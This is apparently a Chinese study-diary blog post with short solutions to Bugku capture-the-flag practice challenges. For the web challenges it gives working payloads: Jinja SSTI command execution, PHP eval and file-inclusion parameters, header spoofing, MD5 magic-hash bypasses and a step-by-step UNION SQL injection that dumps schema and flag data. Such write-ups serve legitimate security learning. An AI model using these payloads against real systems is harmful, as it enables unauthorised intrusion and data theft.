2021/11/02-学习日记

1.Bugku刷题

Simple_SSTI_2

payload:?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%20%27cat%20../app/flag%27).read()%20}}

Flask_FileUpload

import os
os.system("cat /flag")

1和0的故事

二进制矩阵可以组成一个二维码,扫码即可。

easy_nbt

nbt是我的世界的文件格式,下载nbtexplorer打开文件夹搜flag即可。

抄错的字符

flag{Aman_very_cool}

这是一张单纯的图片

图片最后有一串编码,转换一下就出flag。注意是key{}形式。

隐写

使用TweakPNG将图片尺寸改为500*500。

telnet

文件后缀名改为txt直接搜flag。
或是用wireshark打开文件,筛选出telnet包,跟踪tcp流,第一个就是。

眼见非实

解压,把后缀名改为.zip,继续解压,然后打开document.xml,找flag。

啊哒

用binwalk分离文件,得到一个压缩包,在原图属性中,摄像机型号中有一串字符串,转码得到解压密码。

/.-

摩斯密码。

聪明的小羊

栅栏密码,解密即可。

ok

Ook解密即可。

[+-<>]

BrainFuck解码即可。

滑稽

查看源码。

计算器

F12,把输入框的宽度改一下,输入计算结果即可。

矛盾

1'

alert

源码里最后的字符进行html解码。

你必须让他停下

burp抓包,刷新页面,然后连续放两次包,F12查看即可。

game1

随便玩一下,抓包,然后把分数改高一点,sign后为对应的base64加密。

?score=50000&ip=27.18.178.103&sign=zMNTAwMDA===

网站被黑

目录爆破,找到shell.php,密码是hack。

本地管理员

源码注释里有个base64加密串,解密一下就是密码,账号为admin。burp抓包,X-Forwarded-For:127.0.0.1,即可。

bp

爆破密码,提示中给出为z开头的,后面跟五个字符,筛选一下即可。

eval

?hello=show_source(%27flag.php%27)

变量1

?args=globals//php全局变量的使用

头等舱

flag在响应头中。

社工-伪造

输入框内输入“我是你男朋友”。
哈哈哈哈

source

dirsearch扫描发现.git泄露,用githack下载,没有真flag。用wget -r url 命令下载,到.git文件夹中找flag。git reflog查看日志,然后使用git show 文件名 命令一个一个找。

源代码

源码中的三段unicode编码拼接起来转码一下。

文件包含

?file=/flag

好像需要密码

五位数字密码直接爆破即可。

入门逆向

ida打开exe文件就是flag。

Easy_Re

notepad++打开文件直接搜DUTCTF

把猪困在猪圈里

base64转图片,猪圈密码解密。

你喜欢下棋吗

棋盘密码解密得到解压密码,博多密码解密得到flag。

备份是个好习惯

双写key绕过替换函数,传入md5值相同的绕过if判断。

?kkeyey1=QNKCDZO&kkeyey2=240610708

cookies

filename为base64加密后的文件名。访问index.php得到源码,注意前边的line参数。写个py脚本爆出代码来,然后构造payload。

?line=&filename=a2V5cy5waHA=
Cookie: margin=margin

成绩查询

法一:sqlmap。
法二:联合查询注入。

id=1'order by 4 %23//5
id=-1'union select 1,2,3,4 %23
id=-1'union select 1,2,3,database() %23
id=-1'union select 1,2,3,group_concat(distinct table_name) from information_schema.columns where table_schema='skctf' %23
id=-1'union select 1,2,3,group_concat(distinct column_name) from information_schema.columns where table_schema='skctf' %23
id=-1'union select 1,2,3,skctf_flag from fl4g %23

你从哪里来

Referer:www.google.com

你可能感兴趣的:(2021/11/02-学习日记)